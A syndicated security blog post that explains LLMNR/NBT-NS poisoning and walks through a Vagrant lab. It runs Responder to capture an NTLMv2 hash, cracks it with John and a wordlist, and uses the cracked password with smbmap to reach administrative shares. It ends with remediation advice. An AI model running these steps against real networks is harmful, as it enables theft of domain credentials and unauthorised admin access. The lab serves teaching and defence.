SBN

Respond the Name

Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are two name resolution protocols that help
Windows hosts to find address names from other devices on the network.
These are Windows components and are alternate methods of host
identification. LLMNR is based upon the Domain Name System (DNS),
it uses a simple exchange of request and response messages to resolve
computer names on IPV6 or IPV4 addresses.

NBT-NS uses NetBIOS to resolve IPV4 addresses by broadcasting a
NetBIOS Name Query Request message to the local subnet broadcast
address using the port UDP 137. The node that owns the queried name
then sends back a unicast message to the requestor. If NBT-NS is
disabled then it will need to use DNS queries to resolve names, and if
the network does not have DNS servers then the names should be in the
Hosts file of the machine.

LLMNR messages use a similar format to DNS messages but use UDP port 5355. It works by sending a LLMNR Name Query Request message to
the multicast address, this multicast address is scoped to prevent a
multicast enabler router from forwarding the request outside the
requestor subnet. If a host on the subnet is authoritative for the
request name it sends a unicast response to the requestor.

As both protocols use broadcast messages to resolve names on the
network, an attacker can listen to them and then respond with a spoof of
an authoritative source for name resolution as if he knew the requested
name. Then with the service poisoned, the victim will continue the
communication with the attacker, and if the network resource needs
authentication, the victim will send a username and an NTLMv2 hash.
Here the attacker can use tools like JohnTheRipper to crack the
credentials and have access to the system. This attack is called
LLMNR/NBT-NS Poisoning and Relay.

Responder lab

To set up our lab we are going to use Hashicorp’s
Vagrant; the source files are below.
Create a folder with the name requestor and save the Vagrantfile
there. Also create another folder inside requestor named provision
and save the file ad.ps1 there.

setting up the lab.

$ mkdir requestor$ cd requestorrequestor$ nano Vagrantfile #Add here the contentrequestor$ mkdir provisionrequestor$ nano provision/ad.ps1 #Add here the content

Vagrantfile.

# -*- mode: ruby -*-# vi: set ft=ruby :Vagrant.configure("2") do |config|  config.vm.box = "cdaf/WindowsServerDC"  config.vm.hostname = "winserver"  config.vm.network "private_network", ip: "192.168.56.2"  config.vm.provision "shell", path: "provision/ad.ps1"end

provision/ad.ps1.

Import-Module ServerManagerAdd-WindowsFeature RSAT-AD-PowerShellimport-module activedirectoryNew-ADuser -Name "reqtest" -SamAccountName reqtest -Enabled $true -AccountPassword (ConvertTo-SecureString -AsPlainText "SuperSecure@123!!!" -Force)New-ADuser -Name "svctest" -SamAccountName svctest -Enabled $true -AccountPassword (ConvertTo-SecureString -AsPlainText "Monkey.123" -Force)setspn -A sky.net/reqtest reqtestsetspn -A sky.net/svctest svctestAdd-ADGroupMember -Identity "Administrators" -Members svctestAdd-ADGroupMember -Identity "Users" -Members reqtest

Then run the environment using:

vagrant up.

requestor$ vagrant up

This will create a Windows machine with Active Directory installed
and configured. At this point, everything we need has been completed and
is ready for us to launch an attack.

Now we can set up our attacking machine. Here we are using Kali
Linux
with Vagrant too, but you can use
whatever OS you prefer.

These are the tools that we are going to use:

If you are using Kali, the only thing that needs to be cloned is
Responder.

cloning Responder.

git clone https://github.com/SpiderLabs/Responder

We are ready to go.

Starting the poisoner

The only thing we need to do is to run Responder as a root. We can do
this with the following:

running Responder.

Responder$ sudo ./Responder.py -I eth1 -wrf

Responder.

NBT-NS, LLMNR & MDNS Responder 2.3Author: Laurent Gaffie ([email protected])To kill this script hit CRTL-C[+] Poisoners:LLMNR                      [ON]NBT-NS                     [ON]DNS/MDNS                   [ON][+] Servers:HTTP server                [ON]HTTPS server               [ON]WPAD proxy                 [ON]SMB server                 [ON]Kerberos server            [ON]SQL server                 [ON]FTP server                 [ON]IMAP server                [ON]POP3 server                [ON]SMTP server                [ON]DNS server                 [ON]LDAP server                [ON][+] HTTP Options:Always serving EXE         [OFF]Serving EXE                [OFF]Serving HTML               [OFF]Upstream Proxy             [OFF][+] Poisoning Options:Analyze Mode               [OFF]Force WPAD auth            [OFF]Force Basic Auth           [OFF]Force LM downgrade         [OFF]Fingerprint hosts          [ON][+] Generic Options:Responder NIC              [eth1]Responder IP               [192.168.56.103]Challenge set              [1122334455667788][+] Listening for events...

Since we are on the same network, it is only a matter of time to get a
request from a machine in the subnet. But because our Windows machine
is doing nothing, we will receive nothing.

Capturing credentials

Now let’s act like a normal user in our Windows machine. Log in as
svctest with the domain sky.net and password Monkey.123, then open
the start menu and there type run. In there we are going to look for a
name on the network, just type the following:

searching names.

\\FLUIDATTACKS

There we will get an error accessing the share, but in our attacker
machine we will get the following:

Responder output.

[*] [LLMNR]  Poisoned answer sent to 192.168.56.2 for name FLUIDATTACKS[FINGER] OS Version     : Windows Server 2016 Standard Evaluation 14393[FINGER] Client Version : Windows Server 2016 Standard Evaluation 6.3[SMB] NTLMv2-SSP Client   : 192.168.56.2[SMB] NTLMv2-SSP Username : SKY\svctest[SMB] NTLMv2-SSP Hash     : svctest::SKY:1122334455667788:D78BEB50968B6AEA3D8A9CD04765BB6A:01010000000000008274E5E0A507D60176E66DEAF12162F90000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D00420031003200080030003000000000000000000000000030000037AE67261C1D6D0CEBBD9D3AA1803818C033512B8B0FD6DEBA539CFD272D615B0A001000000000000000000000000000000000000900220063006900660073002F0046004C00550049004400410054005400410043004B0053000000000000000000[SMB] Requested Share     : \\FLUIDATTACKS\IPC$[*] [LLMNR]  Poisoned answer sent to 192.168.56.2 for name FLUIDATTACKS[FINGER] OS Version     : Windows Server 2016 Standard Evaluation 14393[FINGER] Client Version : Windows Server 2016 Standard Evaluation 6.3[*] Skipping previously captured hash for SKY\svctest[SMB] Requested Share     : \\FLUIDATTACKS\IPC$

Responder result

Figure 1. Respoder result

Here we have our hash, they are NTLMv2 hashes, and there we can also
view some information about the server like the OS version and the
requested share. With this, we save that user’s hash on a file.

save hash.

echo 'svctest::SKY:1122334455667788:D78BEB50968B6AEA3D8A9CD04765BB6A:01010000000000008274E5E0A507D60176E66DEAF12162F90000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D00420031003200080030003000000000000000000000000030000037AE67261C1D6D0CEBBD9D3AA1803818C033512B8B0FD6DEBA539CFD272D615B0A001000000000000000000000000000000000000900220063006900660073002F0046004C00550049004400410054005400410043004B0053000000000000000000' > hashllmnr

And then we crack it using John, a SecLists dictionary, and
KoreLogic ruleset. Since NTLMv2 hashes are harder to crack, it could
take a while, depending on your system.

John cracking.

john --wordlist=/usr/share/seclists/Passwords/darkweb2017-top100.txt --rules=KoreLogic hashllmnr

John output.

Using default input encoding: UTF-8Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])Will run 2 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusMonkey.123       (svctest)1g 0:00:00:18 DONE (2020-03-31 17:55) 0.05518g/s 575858p/s 575858c/s 575858C/s Asdfgh.jkl13..Asdfgh.jkl24Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliablySession completed

And it’s cracked! Now we can check our access running smbmap again
with our new set of credentials.

samba high privileges.

smbmap -u svctest -p 'Monkey.123' -d sky.net -H 192.168.56.2

admin smbmap.

[+] Finding open SMB ports....[+] User SMB session establishd on 192.168.56.2...[+] IP: 192.168.56.2:445        Name: 192.168.56.2        Disk                                                    Permissions        ----                                                    -----------        ADMIN$                                                  READ, WRITE        C$                                                      READ, WRITE        IPC$                                                    READ ONLY        NETLOGON                                                READ, WRITE        SYSVOL                                                  READ, WRITE        [!] Unable to remove test directory at \\192.168.56.2\SYSVOL\edWFuwvkCb, plreae remove manually

As you can see, we now have administrative access to our server. You can
access it by RDP or retrieve files using SMB. Also, you can dump the
SAM to get more users and hashes; these last ones are NTLMv1 and
easily cracked.

This could be done using the reqtest account or the vagrant account.
If an attacker does this in an enterprise network, he can capture any
number of accounts of the network. Also, there are windows scripts like
Inveigh, where we can do
more or less the same attack with the same results.

Solution

The remediation for this attack is to disable both LLMNR and NBT-NS
on all hosts because Windows defaults to one when the other fails or
is disabled. A host based security software that blocks LLMNR/NBT-NS
requests could also be used.

Another way to mitigate this is by having and using a strong credential
policy. Passwords must be longer than 20 characters, contain upper and
lower case letters, contain symbols and digits, and must not be easy to
guess. This means you would be wise to adopt passphrases instead of
simple passwords.

This is especially useful when you are dealing with service credentials
because they are the ones most targeted. You can also set an alert to
notify you when someone is logged in with your most critical and
high-privileged users.

If you want more information about strong credentials, you can check our
Criteria about them.


*** This is a Security Bloggers Network syndicated blog from Fluid Attacks RSS Feed authored by Jonathan Armas. Read the original post at: https://fluidattacks.com/blog/respond-the-name/